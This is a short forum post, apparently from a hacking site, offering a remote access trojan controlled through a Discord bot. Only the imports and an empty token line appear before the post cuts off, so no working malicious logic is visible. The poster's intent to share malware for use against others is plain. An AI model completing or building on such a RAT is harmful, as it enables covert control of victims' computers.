Sign Up or
Login to view this post and enjoy everything our site has to offer!
So here is a simple discord bot controlled rat i wrote in 25 lines of code. I hope you enjoy it and use it well.
here is the code.
from discord.ext import commands
import platform
import discord
import random
import os
TOKEN = ''#your discord bot token goes in here
secret =...